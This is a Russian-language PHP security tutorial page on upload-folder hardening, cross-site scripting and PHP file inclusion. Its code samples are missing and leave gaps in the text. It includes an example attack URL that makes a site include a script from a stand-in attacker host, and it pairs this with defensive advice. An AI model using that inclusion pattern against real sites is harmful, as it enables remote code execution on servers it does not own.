Задайте вопрос
Поиск по сайту

Содержание:

Глава1 - Основы.

  • Установка и настройка Denwer.
  • Знакомство с РНР.
  • Переменные.
  • Операторы.
  • Массивы и циклы
  • Функции.

  • Глава2 - Разработка web-сайтов и взаимодействие с MySql.
    Partner


    Безопасность Вашего сайта и php кода конечно играет важную роль, т.к. никому не хотелось бы, потратив много сил и времени на создание сайта, однажды обнаружить, что все страницы удалены или изменены шутниками. Или еще хуже - укадены Ваши личные и данные пользователей.

    Что бы обеспечить

    безопасность php скриптов

    , соблюдайте хотябы минимальный набор правил.

    Иногда нужно защитить сервер так, чтобы абсолютно любой загруженный на сервер файл не был исполняемым php файлом.

    Это нужно, кстати, очень частенько, т.к. почти все сайты дают пользователю возможность что-то загружать на сервер: картинки, видео и др. Если у недобросовестного пользователя будет возможность залить на сервер исполняемый файл с вредоносным кодом и запустить его, тогда Ваш труд будет, можно сказать, напрасен, ведь с помощью дыры в безопасности php скрипта на сервере можно творить все что угодно.

    Что бы этого избежать, паралельно с др. средствами защиты, можно использовать следующее:

    Создавайте отдельную директорию, куда будут загружаться все файлы извне и ставьте запрет на выполнение абсолютно любых скриптов в этой директории. Для этого создайте в этой папке файл с именем .htaccess (.htaccess - это не расширение! Имя файла должно содержать точку) со следующим содержанием:

    php_flag engine 0

    Все, теперь даже если в эту директорию загрузят исполняемый php скрипт, он не выполнится.



    Другие атаки, такие как межсайтовый скриптинг, тоже довольно опасны и примеры таких атак можно видеть чуть ли не ежечасно. Посмотрите - скорее всего и Ваши скрипты могут быть не защищены от этого.

    Так же всегда проверяйте введенные данные от пользователя. НИКОГДА не доверяйте полученным данным, которые Вы не контролируете.

    Конечно, межсайтовый скриптинг возможен в большинстве своих случаев, из за того, что программисты не могут обеспечить создать нормальные условия для безопасности кода. Все PHP программисты, конечно, должны знать как можно осуществить атаки через свои PHP скрипты, используя все уязвимости.

    Примеры, примеры и еще раз примеры!

    Есть простая форма



    Обработчик safe.php просто выводит данные



    Данные совсем не фильтруются и злоумышленник может послать, например, такой код:



    Но это все ребячество, а вот если код был написан с целью кражи куков, в которых у Вас могут быть пароли и много еще чего интересного, то это уже не шутки.

    Всегда фильтруем данные и проверяим их на валидность (соответствие тому формату, который ожидается)



    Пример валидации телефонного номера:






    PHP инъекции.



    - выполнение стороннего кода на сервере. Сразу пример:



    Этот код, конечно же, идеален для php инъекции, т.к. к переменной $module просто прибавляется расширение .php и все. Т.е. хакер может просто создать у себя на сайте php скрипт http://www.hacksite.com/hack.php и потом зайти на Ваш сайт передав параметр после знака ? так: http://vashsait/index.php?module=http://www.hacksite.com/hack и после этого выполнять любой код!

    Самый аккуратный способ защиты - это проверять что в $module передано одно из разрешенных значений



    Скоро я добавлю в эту статью еще немного информации о том

    как защитить php скрипт

    , не пропустите!

    Коментарии



    Добавьте коментарий:
    Имя*:

    Коментарий*:

    Введите символы с картинки без пробелов*: